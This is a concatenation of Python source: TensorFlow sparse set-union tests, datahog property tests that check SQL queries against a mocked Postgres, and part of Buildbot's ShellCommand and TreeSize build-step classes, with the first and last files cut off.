a_values = [[1, 1, 3]]
b_values = [[1]]
expected_indices = [[0, 0], [0, 1]]
expected_values = _values([1, 3], dtype)
expected_shape = [1, 2]
# Dense to sparse.
a = _constant(a_values, dtype=dtype)
sp_b = _dense_to_sparse(b_values, dtype=dtype)
union = self._set_union(a, sp_b)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, union, dtype=dtype)
self.assertAllEqual([2], self._set_union_count(a, sp_b))
# Sparse to sparse.
sp_a = _dense_to_sparse(a_values, dtype=dtype)
union = self._set_union(sp_a, sp_b)
self._assert_set_operation(
expected_indices, expected_values, expected_shape, union, dtype=dtype)
self.assertAllEqual([2], self._set_union_count(sp_a, sp_b))
def test_sparse_set_union_3d(self):
for dtype in _DTYPES:
self._test_sparse_set_union_3d(dtype)
def test_sparse_set_union_3d_invalid_indices(self):
for dtype in _DTYPES:
self._test_sparse_set_union_3d(dtype, invalid_indices=True)
def _test_sparse_set_union_3d(self, dtype, invalid_indices=False):
if invalid_indices:
indices = tf.constant([
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[0, 0, 0], [0, 0, 2], # 0,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
else:
indices = tf.constant([
[0, 0, 0], [0, 0, 2], # 0,0
[0, 1, 0], [0, 1, 1], # 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
# 2,0
[2, 1, 1] # 2,1
# 3,*
], tf.int64)
sp_a = tf.SparseTensor(
indices,
_constant([
1, 9, # 0,0
3, 3, # 0,1
1, # 1,0
9, 7, 8, # 1,1
# 2,0
5 # 2,1
# 3,*
], dtype),
tf.constant([4, 2, 3], tf.int64))
sp_b = tf.SparseTensor(
tf.constant([
[0, 0, 0], [0, 0, 3], # 0,0
# 0,1
[1, 0, 0], # 1,0
[1, 1, 0], [1, 1, 1], # 1,1
[2, 0, 1], # 2,0
[2, 1, 1], # 2,1
[3, 0, 0], # 3,0
[3, 1, 0] # 3,1
], tf.int64),
_constant([
1, 3, # 0,0
# 0,1
3, # 1,0
7, 8, # 1,1
2, # 2,0
5, # 2,1
4, # 3,0
4 # 3,1
], dtype),
tf.constant([4, 2, 4], tf.int64))
if invalid_indices:
with self.assertRaisesRegexp(tf.OpError, "out of order"):
self._set_union(sp_a, sp_b)
else:
expected_indices = [
[0, 0, 0], [0, 0, 1], [0, 0, 2], # 0,0
[0, 1, 0], # 0,1
[1, 0, 0], [1, 0, 1], # 1,0
[1, 1, 0], [1, 1, 1], [1, 1, 2], # 1,1
[2, 0, 0], # 2,0
[2, 1, 0], # 2,1
[3, 0, 0], # 3,0
[3, 1, 0], # 3,1
]
expected_values = _values([
1, 3, 9, # 0,0
3, # 0,1
1, 3, # 1,0
7, 8, 9, # 1,1
2, # 2,0
5, # 2,1
4, # 3,0
4, # 3,1
], dtype)
expected_shape = [4, 2, 3]
expected_counts = [[
3, # 0,0
1 # 0,1
], [
2, # 1,0
3 # 1,1
], [
1, # 2,0
1 # 2,1
], [
1, # 3,0
1 # 3,1
]]
intersection = self._set_union(sp_a, sp_b)
self._assert_set_operation(expected_indices, expected_values,
expected_shape, intersection, dtype=dtype)
self.assertAllEqual(expected_counts, self._set_union_count(sp_a, sp_b))
def _set_union(self, a, b):
# Validate that we get the same results with or without `validate_indices`.
ops = [
tf.contrib.metrics.set_union(a, b, validate_indices=True),
tf.contrib.metrics.set_union(a, b, validate_indices=False)
]
with self.test_session() as sess:
results = sess.run(ops)
self.assertAllEqual(results[0].indices, results[1].indices)
self.assertAllEqual(results[0].values, results[1].values)
self.assertAllEqual(results[0].shape, results[1].shape)
return results[0]
def _set_union_count(self, a, b):
op = tf.contrib.metrics.set_size(tf.contrib.metrics.set_union(a, b))
with self.test_session() as sess:
return sess.run(op)
  def _assert_set_operation(self, expected_indices, expected_values,
                            expected_shape, sparse_tensor, dtype):
    """Check a set-op result against expected sparse components.

    Indices and shape are compared exactly. Values are compared group-wise
    (a group is all entries sharing the same indices except the last dim),
    as sets, so ordering within a group does not matter.
    """
    self.assertAllEqual(expected_indices, sparse_tensor.indices)
    self.assertAllEqual(len(expected_indices), len(expected_values))
    self.assertAllEqual(len(expected_values), len(sparse_tensor.values))
    expected_set = set()
    actual_set = set()
    last_indices = None
    for indices, expected_value, actual_value in zip(
        expected_indices, expected_values, sparse_tensor.values):
      if dtype == tf.string:
        actual_value = actual_value.decode("utf-8")
      # A new group started: compare and reset the per-group accumulators.
      if last_indices and (last_indices[:-1] != indices[:-1]):
        self.assertEqual(
            expected_set, actual_set, "Expected %s, got %s, at %s." % (
                expected_set, actual_set, indices))
        expected_set.clear()
        actual_set.clear()
      expected_set.add(expected_value)
      actual_set.add(actual_value)
      last_indices = indices
    # Compare the final (still-accumulated) group.
    self.assertEqual(
        expected_set, actual_set, "Expected %s, got %s, at %s." % (
            expected_set, actual_set, last_indices))
    self.assertAllEqual(expected_shape, sparse_tensor.shape)
# Run the test suite when invoked directly.
if __name__ == "__main__":
  googletest.main()
| |
# vim: fileencoding=utf8:et:sw=4:ts=8:sts=4
import os
import sys
import unittest
import datahog
from datahog.const import util
from datahog import error
import mummy
import psycopg2
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
import base
from pgmock import *
class PropertyTests(base.TestCase):
    """Tests for datahog property operations against a mocked postgres.

    Each test seeds the pgmock fetch results, invokes a datahog.prop
    function, and asserts both the return value and the exact sequence of
    cursor events (including the literal SQL text) recorded in `eventlog`.
    """

    def setUp(self):
        super(PropertyTests, self).setUp()
        # ctx 1: a NODE; ctx 2: an INT property hanging off ctx-1 nodes.
        datahog.set_context(1, datahog.NODE)
        datahog.set_context(2, datahog.PROPERTY,
            {'base_ctx': 1, 'storage': datahog.storage.INT})

    def test_set_insert(self):
        # (inserted, updated) == (True, False): the property was created.
        add_fetch_result([(True, False)])

        self.assertEqual(
            datahog.prop.set(self.p, 1234, 2, 10),
            (True, False))

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
with existencequery as (
    select 1
    from node
    where
        time_removed is null
        and id=%s
        and ctx=%s
),
updatequery as (
    update property
    set num=%s, value=null
    where
        time_removed is null
        and base_id=%s
        and ctx=%s
        and exists (select 1 from existencequery)
    returning 1
),
insertquery as (
    insert into property (base_id, ctx, num, flags)
    select %s, %s, %s, %s
    where
        not exists (select 1 from updatequery)
        and exists (select 1 from existencequery)
    returning 1
)
select
    exists (select 1 from insertquery),
    exists (select 1 from updatequery)
""", (1234, 1, 10, 1234, 2, 1234, 2, 10, 0)),
            FETCH_ONE,
            COMMIT])

    def test_set_update(self):
        # (inserted, updated) == (False, True): an existing row was updated.
        add_fetch_result([(False, True)])

        self.assertEqual(
            datahog.prop.set(self.p, 1234, 2, 10),
            (False, True))

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
with existencequery as (
    select 1
    from node
    where
        time_removed is null
        and id=%s
        and ctx=%s
),
updatequery as (
    update property
    set num=%s, value=null
    where
        time_removed is null
        and base_id=%s
        and ctx=%s
        and exists (select 1 from existencequery)
    returning 1
),
insertquery as (
    insert into property (base_id, ctx, num, flags)
    select %s, %s, %s, %s
    where
        not exists (select 1 from updatequery)
        and exists (select 1 from existencequery)
    returning 1
)
select
    exists (select 1 from insertquery),
    exists (select 1 from updatequery)
""", (1234, 1, 10, 1234, 2, 1234, 2, 10, 0)),
            FETCH_ONE,
            COMMIT])

    def test_set_fail_no_obj(self):
        # Neither inserted nor updated: the base node doesn't exist.
        add_fetch_result([(False, False)])

        self.assertRaises(error.NoObject,
                datahog.prop.set, self.p, 1234, 2, 10)

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
with existencequery as (
    select 1
    from node
    where
        time_removed is null
        and id=%s
        and ctx=%s
),
updatequery as (
    update property
    set num=%s, value=null
    where
        time_removed is null
        and base_id=%s
        and ctx=%s
        and exists (select 1 from existencequery)
    returning 1
),
insertquery as (
    insert into property (base_id, ctx, num, flags)
    select %s, %s, %s, %s
    where
        not exists (select 1 from updatequery)
        and exists (select 1 from existencequery)
    returning 1
)
select
    exists (select 1 from insertquery),
    exists (select 1 from updatequery)
""", (1234, 1, 10, 1234, 2, 1234, 2, 10, 0)),
            FETCH_ONE,
            COMMIT])

    def test_set_race_cond_backup(self):
        # The combined upsert hits an IntegrityError (a concurrent insert
        # won the race); prop.set must roll back and retry as a plain update.
        def initial_failure():
            query_fail(None)
            return psycopg2.IntegrityError()
        query_fail(initial_failure)
        add_fetch_result([()])

        self.assertEqual(
            datahog.prop.set(self.p, 1234, 2, 10),
            (False, True))

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE_FAILURE("""
with existencequery as (
    select 1
    from node
    where
        time_removed is null
        and id=%s
        and ctx=%s
),
updatequery as (
    update property
    set num=%s, value=null
    where
        time_removed is null
        and base_id=%s
        and ctx=%s
        and exists (select 1 from existencequery)
    returning 1
),
insertquery as (
    insert into property (base_id, ctx, num, flags)
    select %s, %s, %s, %s
    where
        not exists (select 1 from updatequery)
        and exists (select 1 from existencequery)
    returning 1
)
select
    exists (select 1 from insertquery),
    exists (select 1 from updatequery)
""", (1234, 1, 10, 1234, 2, 1234, 2, 10, 0)),
            ROLLBACK,
            EXECUTE("""
update property
set num=%s, value=%s
where
    time_removed is null
    and base_id=%s
    and ctx=%s
""", (10, None, 1234, 2)),
            ROWCOUNT,
            COMMIT])

    def test_get_success(self):
        add_fetch_result([(15, 0)])

        self.assertEqual(
            datahog.prop.get(self.p, 1234, 2),
            {'base_id': 1234, 'ctx': 2, 'flags': set([]), 'value': 15})

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
select num, flags
from property
where
    time_removed is null
    and base_id=%s
    and ctx=%s
""", (1234, 2)),
            ROWCOUNT,
            FETCH_ONE,
            COMMIT])

    def test_get_failure(self):
        # No row: get() returns None rather than raising.
        add_fetch_result([])

        self.assertEqual(
            datahog.prop.get(self.p, 1234, 2),
            None)

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
select num, flags
from property
where
    time_removed is null
    and base_id=%s
    and ctx=%s
""", (1234, 2)),
            ROWCOUNT,
            COMMIT])

    def test_get_list_list(self):
        datahog.set_context(3, datahog.PROPERTY, {
            'base_ctx': 1, 'storage': datahog.storage.STR})
        datahog.set_context(4, datahog.PROPERTY, {
            'base_ctx': 1, 'storage': datahog.storage.STR})
        datahog.set_flag(1, 4)
        datahog.set_flag(2, 4)
        datahog.set_flag(3, 4)

        # flags column 5 == 0b101 -> flag set {1, 3}; ctx 3 has no row,
        # so its slot in the result list is None.
        add_fetch_result([
            (2, 10, None, 0),
            (4, None, "foobar", 5)])

        self.assertEqual(
            datahog.prop.get_list(self.p, 123, [2, 3, 4]),
            [
                {'base_id': 123, 'ctx': 2, 'flags': set([]), 'value': 10},
                None,
                {'base_id': 123, 'ctx': 4, 'flags': set([1, 3]),
                    'value': 'foobar'}
            ])

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
select ctx, num, value, flags
from property
where
    time_removed is null
    and base_id=%s
    and ctx in (%s, %s, %s)
""", (123, 2, 3, 4)),
            FETCH_ALL,
            COMMIT])

    def test_get_list_all(self):
        datahog.set_context(3, datahog.PROPERTY, {
            'base_ctx': 1, 'storage': datahog.storage.STR})
        datahog.set_context(4, datahog.PROPERTY, {
            'base_ctx': 1, 'storage': datahog.storage.STR})
        datahog.set_flag(1, 4)
        datahog.set_flag(2, 4)
        datahog.set_flag(3, 4)

        add_fetch_result([
            (2, 10, None, 0),
            (4, None, "foobar", 5)])

        # Without a ctx list the query has no "ctx in" clause and only the
        # properties that exist are returned (no None placeholders).
        self.assertEqual(
            sorted(datahog.prop.get_list(self.p, 123),
                key=lambda d: d['ctx']),
            [
                {'base_id': 123, 'ctx': 2, 'flags': set([]), 'value': 10},
                {'base_id': 123, 'ctx': 4, 'flags': set([1, 3]),
                    'value': 'foobar'}
            ])

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
select ctx, num, value, flags
from property
where
    time_removed is null
    and base_id=%s
""", (123,)),
            FETCH_ALL,
            COMMIT])

    def test_increment(self):
        add_fetch_result([(10,)])

        self.assertEqual(
            datahog.prop.increment(self.p, 123, 2),
            10)

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set num=num+%s
where
    time_removed is null
    and base_id=%s
    and ctx=%s
returning num
""", (1, 123, 2)),
            ROWCOUNT,
            FETCH_ONE,
            COMMIT])

    def test_increment_limit_pos(self):
        add_fetch_result([(20,)])

        # Positive amount: the value is clamped to the upper limit (20).
        self.assertEqual(
            datahog.prop.increment(self.p, 123, 2, 5, 20),
            20)

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set num=case
    when (num+%s < %s)
    then num+%s
    else %s
end
where
    time_removed is null
    and base_id=%s
    and ctx=%s
returning num
""", (5, 20, 5, 20, 123, 2)),
            ROWCOUNT,
            FETCH_ONE,
            COMMIT])

    def test_increment_limit_neg(self):
        add_fetch_result([(20,)])

        # Negative amount: the comparison flips to a lower-bound clamp.
        self.assertEqual(
            datahog.prop.increment(self.p, 123, 2, -5, 0),
            20)

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set num=case
    when (num+%s > %s)
    then num+%s
    else %s
end
where
    time_removed is null
    and base_id=%s
    and ctx=%s
returning num
""", (-5, 0, -5, 0, 123, 2)),
            ROWCOUNT,
            FETCH_ONE,
            COMMIT])

    def test_add_flags(self):
        datahog.set_flag(1, 2)
        datahog.set_flag(2, 2)
        datahog.set_flag(3, 2)

        # Returned flags column 7 == 0b111 -> {1, 2, 3}; the OR mask for
        # flags [1, 3] is 5 == 0b101.
        add_fetch_result([(7,)])

        self.assertEqual(
            datahog.prop.set_flags(self.p, 123, 2, [1, 3], []),
            set([1, 2, 3]))

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set flags=flags | %s
where time_removed is null and ctx=%s and base_id=%s
returning flags
""", (5, 2, 123)),
            FETCH_ALL,
            COMMIT])

    def test_add_flags_no_prop(self):
        datahog.set_flag(1, 2)
        datahog.set_flag(2, 2)
        datahog.set_flag(3, 2)

        add_fetch_result([])

        self.assertEqual(
            datahog.prop.set_flags(self.p, 123, 2, [1, 3], []),
            None)

    def test_clear_flags(self):
        datahog.set_flag(1, 2)
        datahog.set_flag(2, 2)
        datahog.set_flag(3, 2)

        # Clearing [1, 2] masks with ~3; remaining flags 4 == 0b100 -> {3}.
        add_fetch_result([(4,)])

        self.assertEqual(
            datahog.prop.set_flags(self.p, 123, 2, [], [1, 2]),
            set([3]))

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set flags=flags & ~%s
where time_removed is null and ctx=%s and base_id=%s
returning flags
""", (3, 2, 123)),
            FETCH_ALL,
            COMMIT])

    def test_clear_flags_no_prop(self):
        datahog.set_flag(1, 2)
        datahog.set_flag(2, 2)
        datahog.set_flag(3, 2)

        add_fetch_result([])

        self.assertEqual(
            datahog.prop.set_flags(self.p, 123, 2, [], [1, 3]),
            None)

    def test_set_flags_add(self):
        datahog.set_flag(1, 2)
        datahog.set_flag(2, 2)
        datahog.set_flag(3, 2)

        add_fetch_result([(5,)])

        self.assertEqual(
            datahog.prop.set_flags(self.p, 123, 2, [1, 3], []),
            set([1, 3]))

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set flags=flags | %s
where
    time_removed is null and ctx=%s and base_id=%s
returning flags
""", (5, 2, 123)),
            FETCH_ALL,
            COMMIT])

    def test_set_flags_clear(self):
        datahog.set_flag(1, 2)
        datahog.set_flag(2, 2)
        datahog.set_flag(3, 2)

        add_fetch_result([(1,)])

        self.assertEqual(
            datahog.prop.set_flags(self.p, 123, 2, [], [2, 3]),
            set([1]))

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set flags=flags & ~%s
where
    time_removed is null and ctx=%s and base_id=%s
returning flags
""", (6, 2, 123)),
            FETCH_ALL,
            COMMIT])

    def test_set_flags_both(self):
        datahog.set_flag(1, 2)
        datahog.set_flag(2, 2)
        datahog.set_flag(3, 2)

        add_fetch_result([(1,)])

        # Adds and clears combine into one statement: clear mask 6 (0b110),
        # then OR in 1 (0b001).
        self.assertEqual(
            datahog.prop.set_flags(self.p, 123, 2, [1], [2, 3]),
            set([1]))

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set flags=(flags & ~%s) | %s
where
    time_removed is null and ctx=%s and base_id=%s
returning flags
""", (6, 1, 2, 123)),
            FETCH_ALL,
            COMMIT])

    def test_set_flags_no_prop(self):
        datahog.set_flag(1, 2)
        datahog.set_flag(2, 2)
        datahog.set_flag(3, 2)

        add_fetch_result([])

        self.assertEqual(
            datahog.prop.set_flags(self.p, 123, 2, [1], [2, 3]),
            None)

    def test_remove_success(self):
        add_fetch_result([None]) # just a rowcount

        self.assertEqual(
            datahog.prop.remove(self.p, 123, 2),
            True)

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set time_removed=now()
where
    time_removed is null
    and base_id=%s
    and ctx=%s
""", (123, 2)),
            ROWCOUNT,
            COMMIT])

    def test_remove_failure(self):
        add_fetch_result([])

        self.assertEqual(
            datahog.prop.remove(self.p, 123, 2),
            False)

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set time_removed=now()
where
    time_removed is null
    and base_id=%s
    and ctx=%s
""", (123, 2)),
            ROWCOUNT,
            COMMIT])

    def test_remove_assert_val(self):
        add_fetch_result([None])

        # Passing a value adds an "and num=%s" guard to the soft delete.
        self.assertEqual(
            datahog.prop.remove(self.p, 123, 2, 15),
            True)

        self.assertEqual(eventlog, [
            GET_CURSOR,
            EXECUTE("""
update property
set time_removed=now()
where
    time_removed is null
    and base_id=%s
    and ctx=%s
    and num=%s
""", (123, 2, 15)),
            ROWCOUNT,
            COMMIT])

    def test_storage_null(self):
        datahog.set_context(3, datahog.PROPERTY, {
            'base_ctx': 1, 'storage': datahog.storage.NULL
        })

        # NULL storage accepts only None.
        self.assertRaises(error.StorageClassError, util.storage_wrap, 3, 0)
        self.assertEqual(util.storage_wrap(3, None), None)
        self.assertEqual(util.storage_unwrap(3, None), None)

    def test_storage_str(self):
        datahog.set_context(4, datahog.PROPERTY, {
            'base_ctx': 1, 'storage': datahog.storage.STR
        })

        # STR storage rejects unicode (Python 2 semantics) and wraps
        # bytestrings as psycopg2 Binary values.
        self.assertRaises(error.StorageClassError, util.storage_wrap, 4, u'x')
        self.assertEqual(
            util.storage_wrap(4, 'test').adapted,
            'test')
        self.assertEqual(
            util.storage_unwrap(4, psycopg2.Binary('testing')),
            'testing')

    def test_storage_utf(self):
        datahog.set_context(5, datahog.PROPERTY, {
            'base_ctx': 1, 'storage': datahog.storage.UTF
        })

        # UTF storage rejects bytestrings and round-trips unicode via utf8.
        self.assertRaises(error.StorageClassError, util.storage_wrap, 5, 'no')
        self.assertEqual(
            util.storage_wrap(5, u'testing').adapted,
            u'testing'.encode('utf8'))
        self.assertEqual(
            util.storage_unwrap(5, psycopg2.Binary('testing')),
            u'testing')

    def test_storage_serial(self):
        datahog.set_context(6, datahog.PROPERTY, {
            'base_ctx': 1, 'storage': datahog.storage.SERIAL,
        })

        # SERIAL storage round-trips arbitrary structures through mummy.
        self.assertEqual(
            util.storage_wrap(6, ['test', 'path', {10: 0.1}]).adapted,
            mummy.dumps(['test', 'path', {10: 0.1}]))
        self.assertEqual(
            util.storage_unwrap(6, psycopg2.Binary('\x10\x03\x08\x04test\x08\x04path\x13\x01\x02\n\x07?\xb9\x99\x99\x99\x99\x99\x9a')),
            ['test', 'path', {10: 0.1}])
# Run the test suite when invoked directly.
if __name__ == '__main__':
    unittest.main()
| |
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import re
import inspect
from twisted.python import log, failure
from twisted.spread import pb
from twisted.python.deprecate import deprecatedModuleAttribute
from twisted.python.versions import Version
from buildbot.process import buildstep
from buildbot.status.results import SUCCESS, WARNINGS, FAILURE
from buildbot.status.logfile import STDOUT, STDERR
from buildbot import config
# for existing configurations that import WithProperties from here. We like
# to move this class around just to keep our readers guessing.
from buildbot.process.properties import WithProperties
_hush_pyflakes = [WithProperties]
del _hush_pyflakes
class ShellCommand(buildstep.LoggingBuildStep):
    """I run a single shell command on the buildslave. I return FAILURE if
    the exit code of that command is non-zero, SUCCESS otherwise. To change
    this behavior, override my .evaluateCommand method, or customize
    the decodeRC argument.

    By default, a failure of this step will mark the whole build as FAILURE.
    To override this, give me an argument of flunkOnFailure=False .

    I create a single Log named 'log' which contains the output of the
    command. To create additional summary Logs, override my .createSummary
    method.

    The shell command I run (a list of argv strings) can be provided in
    several ways:
      - a class-level .command attribute
      - a command= parameter to my constructor (overrides .command)
      - set explicitly with my .setCommand() method (overrides both)

    @ivar command: a list of renderable objects (typically strings or
                   WithProperties instances). This will be used by start()
                   to create a RemoteShellCommand instance.
    @ivar logfiles: a dict mapping log NAMEs to workdir-relative FILENAMEs
                    of their corresponding logfiles. The contents of the file
                    named FILENAME will be put into a LogFile named NAME, in
                    something approximating real-time. (note that logfiles=
                    is actually handled by our parent class LoggingBuildStep)
    @ivar lazylogfiles: Defaults to False. If True, logfiles will be tracked
                        `lazily', meaning they will only be added when and if
                        they are written to. Empty or nonexistent logfiles
                        will be omitted. (Also handled by class
                        LoggingBuildStep.)
    """

    name = "shell"
    renderables = buildstep.LoggingBuildStep.renderables + [
        'slaveEnvironment', 'remote_kwargs', 'command',
        'description', 'descriptionDone', 'descriptionSuffix']

    description = None # set this to a list of short strings to override
    descriptionDone = None # alternate description when the step is complete
    descriptionSuffix = None # extra information to append to suffix
    command = None # set this to a command, or set in kwargs
    # logfiles={} # you can also set 'logfiles' to a dictionary, and it
    #               will be merged with any logfiles= argument passed in
    #               to __init__

    # override this on a specific ShellCommand if you want to let it fail
    # without dooming the entire build to a status of FAILURE
    flunkOnFailure = True

    def __init__(self, workdir=None,
                 description=None, descriptionDone=None, descriptionSuffix=None,
                 command=None,
                 usePTY="slave-config",
                 **kwargs):
        # most of our arguments get passed through to the RemoteShellCommand
        # that we create, but first strip out the ones that we pass to
        # BuildStep (like haltOnFailure and friends), and a couple that we
        # consume ourselves.

        if description:
            self.description = description
        if isinstance(self.description, str):
            self.description = [self.description]
        if descriptionDone:
            self.descriptionDone = descriptionDone
        if isinstance(self.descriptionDone, str):
            self.descriptionDone = [self.descriptionDone]

        if descriptionSuffix:
            self.descriptionSuffix = descriptionSuffix
        if isinstance(self.descriptionSuffix, str):
            self.descriptionSuffix = [self.descriptionSuffix]

        if command:
            self.setCommand(command)

        # pull out the ones that LoggingBuildStep wants, then upcall
        buildstep_kwargs = {}
        # Python 2: keys() returns a list; the [:] copy allows deletion
        # from kwargs while iterating.
        for k in kwargs.keys()[:]:
            if k in self.__class__.parms:
                buildstep_kwargs[k] = kwargs[k]
                del kwargs[k]
        buildstep.LoggingBuildStep.__init__(self, **buildstep_kwargs)

        # check validity of arguments being passed to RemoteShellCommand
        invalid_args = []
        valid_rsc_args = inspect.getargspec(buildstep.RemoteShellCommand.__init__)[0]
        for arg in kwargs.keys():
            if arg not in valid_rsc_args:
                invalid_args.append(arg)
        # Raise Configuration error in case invalid arguments are present
        if invalid_args:
            config.error("Invalid argument(s) passed to RemoteShellCommand: "
                         + ', '.join(invalid_args))

        # everything left over goes to the RemoteShellCommand
        kwargs['workdir'] = workdir # including a copy of 'workdir'
        kwargs['usePTY'] = usePTY
        self.remote_kwargs = kwargs

    def setBuild(self, build):
        """Upcall, then capture the build's environment for rendering."""
        buildstep.LoggingBuildStep.setBuild(self, build)
        # Set this here, so it gets rendered when we start the step
        self.slaveEnvironment = self.build.slaveEnvironment

    def setStepStatus(self, step_status):
        # Pure upcall; kept for subclasses that expect to override it.
        buildstep.LoggingBuildStep.setStepStatus(self, step_status)

    def setDefaultWorkdir(self, workdir):
        """Use `workdir` only if no workdir was given at construction."""
        rkw = self.remote_kwargs
        rkw['workdir'] = rkw['workdir'] or workdir

    def getWorkdir(self):
        """
        Get the current notion of the workdir.  Note that this may change
        between instantiation of the step and C{start}, as it is based on the
        build's default workdir, and may even be C{None} before that point.
        """
        return self.remote_kwargs['workdir']

    def setCommand(self, command):
        """Override the command to run (takes precedence over .command)."""
        self.command = command

    def _flattenList(self, mainlist, commands):
        """Recursively append the leaves of nested lists/tuples to mainlist;
        empty sublists are dropped."""
        for x in commands:
            if isinstance(x, (list, tuple)):
                if x != []:
                    self._flattenList(mainlist, x)
            else:
                mainlist.append(x)

    def describe(self, done=False):
        """Return _describe()'s words plus any descriptionSuffix."""
        desc = self._describe(done)
        if self.descriptionSuffix:
            desc = desc[:]
            desc.extend(self.descriptionSuffix)
        return desc

    def _describe(self, done=False):
        """Return a list of short strings to describe this step, for the
        status display. This uses the first few words of the shell command.
        You can replace this by setting .description in your subclass, or by
        overriding this method to describe the step better.

        @type  done: boolean
        @param done: whether the command is complete or not, to improve the
                     way the command is described. C{done=False} is used
                     while the command is still running, so a single
                     imperfect-tense verb is appropriate ('compiling',
                     'testing', ...) C{done=True} is used when the command
                     has finished, and the default getText() method adds some
                     text, so a simple noun is appropriate ('compile',
                     'tests' ...)
        """

        try:
            if done and self.descriptionDone is not None:
                return self.descriptionDone
            if self.description is not None:
                return self.description

            # we may have no command if this is a step that sets its command
            # name late in the game (e.g., in start())
            if not self.command:
                return ["???"]

            words = self.command
            if isinstance(words, (str, unicode)):
                words = words.split()

            try:
                len(words)
            except AttributeError:
                # WithProperties and Property don't have __len__
                return ["???"]

            # flatten any nested lists
            tmp = []
            self._flattenList(tmp, words)
            words = tmp

            # strip instances and other detritus (which can happen if a
            # description is requested before rendering)
            words = [ w for w in words if isinstance(w, (str, unicode)) ]

            if len(words) < 1:
                return ["???"]
            if len(words) == 1:
                return ["'%s'" % words[0]]
            if len(words) == 2:
                return ["'%s" % words[0], "%s'" % words[1]]
            return ["'%s" % words[0], "%s" % words[1], "...'"]

        except:
            log.err(failure.Failure(), "Error describing step")
            return ["???"]

    def setupEnvironment(self, cmd):
        # merge in anything from Build.slaveEnvironment
        # This can be set from a Builder-level environment, or from earlier
        # BuildSteps. The latter method is deprecated and superseded by
        # BuildProperties.
        # Environment variables passed in by a BuildStep override
        # those passed in at the Builder level.
        slaveEnv = self.slaveEnvironment
        if slaveEnv:
            if cmd.args['env'] is None:
                cmd.args['env'] = {}
            fullSlaveEnv = slaveEnv.copy()
            fullSlaveEnv.update(cmd.args['env'])
            cmd.args['env'] = fullSlaveEnv
            # note that each RemoteShellCommand gets its own copy of the
            # dictionary, so we shouldn't be affecting anyone but ourselves.

    def buildCommandKwargs(self, warnings):
        """Assemble the kwargs for RemoteShellCommand, appending any
        compatibility notes for old slaves to `warnings` (mutated)."""
        kwargs = buildstep.LoggingBuildStep.buildCommandKwargs(self)
        kwargs.update(self.remote_kwargs)
        tmp = []
        if isinstance(self.command, list):
            self._flattenList(tmp, self.command)
        else:
            tmp = self.command

        kwargs['command'] = tmp

        # check for the usePTY flag
        if kwargs.has_key('usePTY') and kwargs['usePTY'] != 'slave-config':
            if self.slaveVersionIsOlderThan("svn", "2.7"):
                warnings.append("NOTE: slave does not allow master to override usePTY\n")
                del kwargs['usePTY']

        # check for the interruptSignal flag
        if kwargs.has_key('interruptSignal') and self.slaveVersionIsOlderThan("shell", "2.15"):
            warnings.append("NOTE: slave does not allow master to specify interruptSignal\n")
            del kwargs['interruptSignal']

        return kwargs

    def start(self):
        # this block is specific to ShellCommands. subclasses that don't need
        # to set up an argv array, an environment, or extra logfiles= (like
        # the Source subclasses) can just skip straight to startCommand()

        warnings = []

        # create the actual RemoteShellCommand instance now
        kwargs = self.buildCommandKwargs(warnings)
        cmd = buildstep.RemoteShellCommand(**kwargs)
        self.setupEnvironment(cmd)
        self.startCommand(cmd, warnings)
class TreeSize(ShellCommand):
    """Measure the checked-out tree's size with `du -s -k .` and publish it
    as the 'tree-size-KiB' build property."""
    name = "treesize"
    command = ["du", "-s", "-k", "."]
    description = "measuring tree size"
    descriptionDone = "tree size measured"
    kib = None

    def commandComplete(self, cmd):
        # du prints "<kilobytes>\t<path>"; grab the leading number.
        output = cmd.logs['stdio'].getText()
        match = re.search(r'^(\d+)', output)
        if match is None:
            return
        self.kib = int(match.group(1))
        self.setProperty("tree-size-KiB", self.kib, "treesize")

    def evaluateCommand(self, cmd):
        if cmd.didFail():
            return FAILURE
        # not sure how 'du' could fail, but whatever
        return SUCCESS if self.kib is not None else WARNINGS

    def getText(self, cmd, results):
        if self.kib is None:
            return ["treesize", "unknown"]
        return ["treesize", "%d KiB" % self.kib]
class SetPropertyFromCommand(ShellCommand):
    """Run a shell command and set build properties from its output.

    Exactly one of two modes must be configured:
      - `property`: set that single property to the command's stdout
        (stripped of surrounding whitespace unless strip=False);
      - `extract_fn`: a callable of (rc, stdout, stderr) returning a dict
        of property names to values, all of which are set.
    Raises a configuration error if both or neither are given.
    """
    name = "setproperty"
    renderables = [ 'property' ]

